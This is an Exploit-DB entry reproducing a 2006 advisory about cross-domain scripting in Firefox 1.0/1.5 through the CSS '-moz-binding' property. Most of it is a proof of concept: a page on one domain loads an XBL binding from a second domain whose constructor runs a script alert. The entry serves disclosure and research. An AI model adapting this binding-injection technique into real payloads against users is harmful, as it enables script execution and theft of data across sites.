Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting

EDB-ID:

27150




Platform:

Linux

Date:

2006-01-30


source: https://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.


This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>